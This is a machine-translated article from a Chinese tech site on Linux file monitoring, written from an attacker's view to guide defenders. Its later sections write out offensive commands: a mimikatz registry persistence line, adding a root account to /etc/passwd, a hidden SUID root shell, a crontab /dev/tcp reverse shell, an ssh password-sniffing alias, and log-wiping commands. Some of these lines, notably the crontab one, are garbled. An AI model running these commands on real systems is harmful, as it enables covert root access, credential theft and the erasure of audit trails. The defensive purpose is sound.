Shulou(Shulou.com)05/31 Report--

This article introduces the relevant knowledge of "how to realize file monitoring in Linux". In the operation process of actual cases, many people will encounter such difficulties. Next, let Xiaobian lead you to learn how to deal with these situations! I hope you can read carefully and learn something!

0x01: Preface

Before from the macro point of view based on ATT&CK matrix ATT&CK matrix Linux system security practices introduced the direction of Linux host detection, the latter series from several levels, reduce the dimension of the introduction, and finally from each small technical point of departure, this article is also based on the attacker's point of view for defense.

Linux file monitoring is a very important environment in security protection, which can identify suspicious tampering and file permission updates, and detect malicious code in time. Take webshell as an example, there are many ways to detect Webshell at present, including HTTP traffic, Web access log, Webshell variable name based on file characteristics, dangerous function name, etc., and dynamic sandbox and machine learning. File feature-based detection is convenient to deploy, a script can be completed, the accuracy rate is high, the extensibility is strong, and the addition rule can be executed. Of course, the file feature value is modified, and it is likely to be bypassed. Identify and analyze malicious samples, based on the principle of text and binary signature matching, through command line interfaces or Python scripts with the YARA-Python extension.

Why file monitoring protection? Is full-text searching necessary for malicious files? How to reduce search volume?

Linux attack form, exclude overflow vulnerability, based on the principle of everything is file, it is ultimately in the modification of files and executable files, files and SVN files or original directory file hash comparison, identify some inconsistent files, through the investigation of new and modified files, and then identify the attacker uploaded Webshell. (The same principle applies to diff.) Also included in command control, persistence, and lateral movement cleanup are file modifications required.

0x02: Open Source Implementable File Monitoring Project OSSEC

Ossec can check files for modifications, what they contain (normally, sometimes), file attributes, and so on. For file monitoring, in the OSSEC.CONF file

。。。。file monitoring content audit

Audit tool can monitor file usage, which process reads and writes files and attribute attribute modifications.

Auditctl -w /home/wt7315 -p wxra

0x03: Directory/Monitoring Monitoring

The/etc directory is the main configuration file of the system, almost all of which are placed in this directory, such as the account password files of personnel, the starting files of various services, etc.

*/bin is mainly used to place some system prerequisite execution files, which are binary files required by users and administrators.

/bin

/usr/bin

/sbin

/usr/sbin

/etc

0x04: File monitoring during the credential acquisition phase of file monitoring information collection from the attacker's perspective

In windows domain penetration, passwords can be obtained through SAM files and plaintext login passwords can be obtained through mimikatz. Security Support Provider (SSP), whose main function is to extend Windows authentication mechanisms, this DLL file is loaded during the lsass.exe startup process. DLL and registry combine, copy mimilib.dll in Mimikatz program to system32 folder of target machine downward path: hklm\system\currentcontrolset\control\lsa\add new value

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

User login will record plaintext password under the same path (System32), and restart will still record.

You can also inject mimikatz into memory. When users log in, the System32 folder will automatically store the login account password stored in mimilsa.

To retrieve the passwords and hashes stored in memory, the linux system must open the mapping file of the process to be analyzed in the/proc file system. This file is stored under the path/proc/$pid/maps. where directory is the unique pid of the program to query for such authentication data.

Use mmipenguin: github.com/huntergreg

File monitoring in persistence

(1.) boot process rhel6 boot process, difference between 7 and 6 using systemd for process initialization

For programs that support service, a configuration file will be automatically added to the/etc/init.d directory during installation. Using service httpd start will open/usr/sbin/httpd pointed to in the/etc/init.d/httpd configuration file.

For programs that support systemd, installation automatically adds a configuration file to the/usr/lib/systemd/system directory. When using systemctl to control the program, systemctl starts httpd.service, systemctl opens the executable file/usr/sbin/httpd pointed to in the httpd.service configuration

(2.) Linux init Before systemd became mainstream, sysvinit was the choice of most distributions, even upstart, which was used before Ubuntu, and sysvinit were fully compatible, and Debian distributions still retain sysvinit compatibility to this day. The Linux init program, PID 1, is responsible for all processes after startup, all services are managed by it, and is a common means of implementing rootkits. For traditional sysvinit, common residency points need to be written as root:

/etc/init.d/etc/rc[runlevel].d/etc/rc.local

For systemd, there are more ways to achieve residency, even without root privileges:

/etc/systemd/system/etc/systemd/user/lib/systemd/system/lib/systemd/user~/.local/share/systemd/user~/.config/systemd/user

(3.) Both bashrc and profile are used to store user context information, bashrc for interactive non-login shells and profile for interactive login shells. There are many bashrc and profile files in the system

(4.) run commands

Files that begin or end with rc:

rcxinetd,~/.bashrc and other files

rc.d and rcX.d etc.

(5.) graphical environment

Desktop environments such as gnome and xorg are common and often overlooked means of installing graphical servers

(6.) mission plan

crond is a daemon used to periodically execute certain tasks or wait for events to be processed under linux. It provides user control plan task commands: crontab, subsystem task scheduling and user read scheduling/var/spool/cron/ /etc/cron*

(7.) Dynamic link library hijacking

Linux dynamic link library loading order:

Run path specified at compile time

LD_LIBRARY_PATH specified places

ldconfig specifies the place

/lib

/usr/lib replaces the dynamic link library libc will be called by almost all ELFs, and specific lib will be called by specific ELFs. As long as the execution probability of a certain ELF is high enough, we can also replace a so file linked by it with our recompiled malicious so to achieve the effect of executing malicious code.

ld.so.preload The most common implementation is to write the so file we want libc to execute in/etc/ld.so.preload, or to set the LD_PRELOAD environment variable/etc/profile~/.bashrc~/.bash_profile~/.bash_logout

File monitoring for permission maintenance

Common backdoor permission-maintenance techniques are as follows, from common backdoor techniques to file monitoring

(1) Add super user account

echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd

(2) Crack/sniff user password

After obtaining the shadow file, use John the Ripper tool to crack the weak user password. According to the situation I used, only some simple common passwords can be cracked. Other passwords are difficult to run out. In addition, hashcat GPUs or distributed servers can be used to crack

(3) Place SUID Shell**

Normal users can run/dev/.rootshell natively to get a shell with root privileges.

cp /bin/bash /dev/.rootshellchmod u+s /dev/.rootshell

(4) Crontab Timed Task

(crontab -l;printf "*/5 * * * * exec9 /dev/tcp/localhost/8080&&exec0&92>&1&&/bin/bash --noprofile -I;rno crontab forwhoami0cn")|crontab -

(5) alias backdoor under the current user directory. bashralias ssh='strace -o /tmp/sshpwd-date '+%d%h%m% s'. log -e read,write,connect -s2048 ssh'

(6) pam backdoor or openssh modify pam_unix_auth.c, add universal password

And so on, all need to add new files or modify files

Clean up traces of file surveillance

(1)Clean up current user only: history -c

(2)Make the system no longer save command records: vi /etc/profile, find the HISTSIZE value, modify it to 0

(3)Delete records Delete login failure records: echo > /var/log/btmp Delete login success records: echo > /var/log/wtmp Delete log records: echo > /var/log/secure

(4)Do not record ssh public key in local.ssh directory

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

(5)Log in to account w administrator is invisible

ssh -T somebody@8.8.8.8 /bin/bash -i

"Linux how to achieve file monitoring" content is introduced here, thank you for reading. If you want to know more about industry-related knowledge, you can pay attention to the website. Xiaobian will output more high-quality practical articles for everyone!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.